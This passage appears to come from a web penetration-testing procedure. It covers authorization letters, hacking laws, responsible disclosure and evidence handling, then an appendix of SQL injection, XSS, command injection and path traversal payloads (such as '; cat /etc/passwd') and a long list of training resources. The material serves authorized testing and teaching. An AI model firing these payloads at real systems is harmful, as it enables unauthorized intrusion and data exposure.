3. Non-Disclosure Agreement (NDA) - Protects sensitive information
4. Testing Authorization Letter - Written permission from asset owner

Example authorization clause:

[Company Name] hereby authorizes [Tester Name/Organization] to perform
security testing on the following systems:

Scope:
- https://app.example.com
- https://api.example.com
- 192.168.1.0/24 (internal network)

Out of Scope:
- https://www.example.com (production marketing site)
- Third-party services (AWS, payment gateways)

Allowed Actions:
- Vulnerability scanning
- Manual penetration testing
- Authenticated testing with provided credentials

Prohibited Actions:
- Denial of Service (DoS) attacks
- Social engineering
- Physical security testing

Duration: January 1, 2025 - January 31, 2025

Authorized by: [Name, Title, Signature, Date]

Legal Frameworks

United States:

• Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. § 1030
  • Unauthorized access is illegal
  • Exceeding authorized access is illegal
• Stored Communications Act (SCA) - 18 U.S.C. § 2701

European Union:

• GDPR (General Data Protection Regulation)
  • Protect personal data discovered during testing
  • Minimize data exposure
  • Report data breaches within 72 hours

United Kingdom:

• Computer Misuse Act 1990
  • Unauthorized access to computer material (Section 1)
  • Unauthorized modification of computer material (Section 3)

Responsible Disclosure

Standard disclosure timeline:

1. Day 0: Discover vulnerability
2. Day 1-7: Privately report to vendor
3. Day 7-90: Vendor investigates and develops fix
4. Day 90: Public disclosure (or earlier if agreed)

Reporting channels:

# Security.txt (RFC 9116)
curl https://target.com/.well-known/security.txt

# Example security.txt:
# Contact: security@example.com
# Expires: 2025-12-31T23:59:59.000Z
# Preferred-Languages: en
# Policy: https://example.com/security-policy

Bug bounty platforms:

• HackerOne: https://www.hackerone.com/
• Bugcrowd: https://www.bugcrowd.com/
• Intigriti: https://www.intigriti.com/
• YesWeHack: https://www.yeswehack.com/

Data Handling

Protect discovered sensitive data:

# ❌ DO NOT:
# - Download user databases
# - Share passwords/credentials
# - Access other users' data beyond PoC
# - Screenshot PII (personally identifiable information)

# ✅ DO:
# - Use test accounts when possible
# - Redact sensitive data in reports
# - Use placeholders: "user@[REDACTED].com"
# - Encrypt evidence files

Evidence encryption:

# Encrypt report with GPG
gpg --encrypt --recipient security@vendor.com pentest_report.pdf

# Encrypt evidence archive
7z a -p -mhe=on evidence.7z screenshots/ logs/
# -p: password protection
# -mhe=on: encrypt filenames

---

Related SOPs

Analysis:

• Reverse Engineering - Binary web service analysis and exploitation
• Cryptography Analysis - JWT analysis, crypto failures, session security
• Malware Analysis - Web shell and malicious script analysis

Pentesting & Security:

• Linux Pentesting - Server-side exploitation and privilege escalation
• Active Directory Pentesting - Web apps with AD/SSO integration
• Mobile Security - Mobile API security testing
• Vulnerability Research - Finding web application vulnerabilities
• Bug Bounty Hunting - Responsible web vulnerability disclosure
• Firmware Reverse Engineering - IoT web interfaces and embedded device testing
• Detection Evasion Testing - Bypassing WAF and security controls
• Forensics Investigation - Web compromise investigation

---

Appendix: Common Payloads

SQL Injection Payloads

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
admin'--
admin'#
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
1' AND SLEEP(5)--
1' AND BENCHMARK(5000000,MD5('A'))--

XSS Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)

Command Injection Payloads

; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
; cat /etc/passwd
| cat /etc/passwd

Path Traversal Payloads

../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//....//etc/passwd
..;/..;/..;/etc/passwd

---

Reference Resources

Comprehensive Knowledge Bases

• OWASP Web Security Testing Guide (WSTG) - owasp.org/www-project-web-security-testing-guide

  • Definitive web application security testing methodology
  • Covers all OWASP Top 10 vulnerabilities in depth
  • Testing techniques, checklists, and remediation guidance

• HackTricks - Web Vulnerabilities - book.hacktricks.xyz/pentesting-web

  • Comprehensive web pentesting techniques
  • Covers SQLi, XSS, CSRF, XXE, SSRF, and more
  • Bypass techniques and exploitation payloads

• PortSwigger Web Security Academy - portswigger.net/web-security

  • Free interactive web security training
  • Hands-on labs for all major vulnerability types
  • Created by Burp Suite developers

• PayloadsAllTheThings - github.com/swisskyrepo/PayloadsAllTheThings

  • Massive collection of web exploitation payloads
  • SQLi, XSS, XXE, SSTI, command injection, and more
  • Bypass techniques and cheat sheets

OWASP Resources

• OWASP Top 10 - owasp.org/www-project-top-ten

  • Most critical web application security risks
  • Updated regularly (latest: 2021)

• OWASP Cheat Sheet Series - cheatsheetseries.owasp.org

  • Secure coding practices for developers
  • Input validation, authentication, session management, cryptography

• OWASP API Security Top 10 - owasp.org/www-project-api-security

  • API-specific vulnerabilities and mitigation

• OWASP Juice Shop - owasp.org/www-project-juice-shop

  • Intentionally vulnerable web application for practice
  • Covers OWASP Top 10 and modern web vulnerabilities

Injection Attack Resources

• sqlmap Documentation - sqlmap.org

  • Automated SQL injection exploitation
  • Database extraction, OS command execution

• SQL Injection Cheat Sheet - portswigger.net/web-security/sql-injection/cheat-sheet

  • Database-specific SQLi payloads (MySQL, PostgreSQL, MSSQL, Oracle)

• NoSQL Injection - book.hacktricks.xyz/pentesting-web/nosql-injection

  • MongoDB, CouchDB, Redis injection techniques

• Command Injection - book.hacktricks.xyz/pentesting-web/command-injection

  • OS command injection payloads and bypass techniques

XSS & Client-Side Attack Resources

• PortSwigger XSS Cheat Sheet - portswigger.net/web-security/cross-site-scripting/cheat-sheet

  • Browser-specific XSS vectors
  • Filter bypass techniques

• XSS Filter Evasion Cheat Sheet - owasp.org/www-community/xss-filter-evasion-cheatsheet

  • WAF and filter bypass payloads

• Browser Exploitation Framework (BeEF) - beefproject.com

  • Browser exploitation framework for XSS post-exploitation

• DOMPurify - github.com/cure53/DOMPurify

  • XSS sanitizer (useful for understanding XSS defenses)

API Security Resources

• API Security Best Practices - apisecurity.io

  • API security news, vulnerabilities, best practices

• GraphQL Security - howtographql.com/advanced/4-security

  • GraphQL-specific vulnerabilities and mitigation

• Postman Learning Center - learning.postman.com/docs/sending-requests/authorization

  • API authentication and testing with Postman

• REST API Security Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html

Authentication & Session Management

• JWT.io - jwt.io

  • JWT decoder and debugger
  • Library implementations for all languages

• jwt_tool - github.com/ticarpi/jwt_tool

  • JWT security testing toolkit

• OWASP Session Management Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html

• Authentication Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

File Upload & XXE Resources

• File Upload Vulnerabilities - book.hacktricks.xyz/pentesting-web/file-upload

  • Bypass techniques, magic byte manipulation, path traversal

• XXE (XML External Entity) - portswigger.net/web-security/xxe

  • XXE exploitation techniques and payloads

• OWASP File Upload Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

SSRF & CSRF Resources

• SSRF Bible - github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

  • SSRF payloads, cloud metadata exploitation, bypass techniques

• CSRF Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

• Burp Collaborator - portswigger.net/burp/documentation/collaborator

  • Out-of-band interaction detection for SSRF, XXE, blind injection

Access Control & IDOR Resources

• IDOR Guide - book.hacktricks.xyz/pentesting-web/idor

  • Insecure Direct Object Reference testing methodology

• Authorization Testing Guide - owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/README

• Broken Access Control - portswigger.net/web-security/access-control

Business Logic & Race Condition Resources

• Business Logic Vulnerabilities - portswigger.net/web-security/logic-flaws

  • Price manipulation, workflow bypass, race conditions

• Race Condition Exploitation - portswigger.net/research/smashing-the-state-machine

  • Turbo Intruder for race condition testing

• OWASP Testing for Business Logic - owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/README

Subdomain Enumeration & Reconnaissance

• Subdomain Enumeration Guide - github.com/appsecco/the-art-of-subdomain-enumeration

  • Comprehensive subdomain discovery techniques

• Certificate Transparency Logs - crt.sh

  • Search for SSL certificates to find subdomains

• Shodan - shodan.io

  • Search engine for internet-connected devices
  • Find exposed services and vulnerabilities

• Censys - censys.io

  • Internet-wide asset discovery

Vulnerability Databases & CVE Resources

• National Vulnerability Database (NVD) - nvd.nist.gov

  • Official CVE database with CVSS scores

• Exploit Database - exploit-db.com

  • Public exploits and vulnerable software

• Packet Storm - packetstormsecurity.com

  • Security tools, exploits, advisories

• VulnHub - vulnhub.com

  • Vulnerable VMs for practice

CMS-Specific Security Resources

• WPScan Vulnerability Database - wpscan.com/wordpresses

  • WordPress core, plugin, and theme vulnerabilities

• WordPress Security - wordpress.org/support/article/hardening-wordpress

  • Official WordPress hardening guide

• Joomla Security Checklist - docs.joomla.org/Security_Checklist

• Drupal Security Team - drupal.org/security

SSL/TLS & Cryptography Testing

• SSL Labs Server Test - ssllabs.com/ssltest

  • Online SSL/TLS configuration testing

• testssl.sh Documentation - testssl.sh

  • SSL/TLS vulnerability scanner

• TLS Cipher Suite Recommendations - ssl-config.mozilla.org

  • Mozilla SSL configuration generator

Web Application Firewalls (WAF) & Bypass Techniques

• WAF Bypass Techniques - github.com/0xInfection/Awesome-WAF

  • WAF fingerprinting and bypass methods

• CloudFlare Bypass - book.hacktricks.xyz/network-services-pentesting/pentesting-web/uncovering-cloudflare

Bug Bounty Platforms & Programs

• HackerOne - hackerone.com/directory/programs

  • Public bug bounty programs

• Bugcrowd - bugcrowd.com/programs

  • Bug bounty and vulnerability disclosure programs

• Intigriti - intigriti.com/programs

  • European bug bounty platform

• YesWeHack - yeswehack.com/programs

Practice Labs & CTF Platforms

• TryHackMe - tryhackme.com

  • Guided web application security labs

• HackTheBox - hackthebox.com

  • Web application challenges and vulnerable machines

• PentesterLab - pentesterlab.com

  • Web penetration testing exercises

• WebGoat - owasp.org/www-project-webgoat

  • OWASP deliberately insecure application for learning

• DVWA (Damn Vulnerable Web Application) - github.com/digininja/DVWA

  • PHP/MySQL vulnerable web app for practice

• bWAPP - itsecgames.com

  • Buggy web application with 100+ vulnerabilities

Security Headers & Best Practices

• Security Headers - securityheaders.com

  • Online security header scanner

• Content Security Policy (CSP) Reference - content-security-policy.com

  • CSP header generator and reference

• Mozilla Observatory - observatory.mozilla.org

  • Security and privacy analysis for websites

Reporting & Documentation

• CVSS Calculator - first.org/cvss/calculator/3.1

  • Common Vulnerability Scoring System calculator

• Vulnerability Report Template - github.com/vulnreport/vulnreport

  • Markdown-based vulnerability reporting

• Offensive Security Report Template - offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf

Legal & Responsible Disclosure

• security.txt RFC 9116 - securitytxt.org

  • Standard for security contact information

• Responsible Disclosure Guide - cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html

• HackerOne Disclosure Guidelines - hackerone.com/disclosure-guidelines

Browser Developer Tools & Extensions

• Chrome DevTools - developer.chrome.com/docs/devtools

  • Network analysis, JavaScript debugging, storage inspection

• Firefox Developer Tools - firefox-source-docs.mozilla.org/devtools-user

• Browser Extension Security - developer.chrome.com/docs/extensions/mv3/security

Training & Certifications

• OSWE (Offensive Security Web Expert) - offensive-security.com/awae-oswe

  • Advanced web application penetration testing certification

• GWAPT (GIAC Web Application Penetration Tester) - giac.org/certification/web-application-penetration-tester-gwapt

• CEH (Certified Ethical Hacker) - Web module

  • eccouncil.org/programs/certified-ethical-hacker-ceh

• eWPT (eLearnSecurity Web Penetration Tester) - elearnsecurity.com/product/ewpt-certification

YouTube Channels & Video Resources

• PwnFunction - youtube.com/@PwnFunction

  • Animated web security vulnerability explanations

• LiveOverflow - youtube.com/@LiveOverflow

  • Web security, CTF writeups, exploit development

• IppSec - youtube.com/@ippsec

  • HackTheBox web application walkthrough

• STÖK - youtube.com/@STOKfredrik

  • Bug bounty hunting and web hacking

• Nahamsec - youtube.com/@NahamSec

  • Bug bounty tips and web recon

Books & Publications

• The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto

  • Comprehensive web security testing manual

• Real-World Bug Hunting by Peter Yaworski

  • Bug bounty case studies and techniques

• Web Security Testing Cookbook by Paco Hope and Ben Walther

  • Practical web security testing recipes

• OWASP Testing Guide v4 - owasp.org/www-project-web-security-testing-guide

  • Free comprehensive testing methodology

GitHub Repositories & Tool Collections

• Awesome Web Security - github.com/qazbnm456/awesome-web-security

  • Curated list of web security resources

• SecLists - github.com/danielmiessler/SecLists

  • Security testing wordlists (usernames, passwords, URLs, fuzzing payloads)

• FuzzDB - github.com/fuzzdb-project/fuzzdb

  • Attack patterns and malicious inputs database

• Web-Attack-Cheat-Sheet - github.com/riramar/Web-Attack-Cheat-Sheet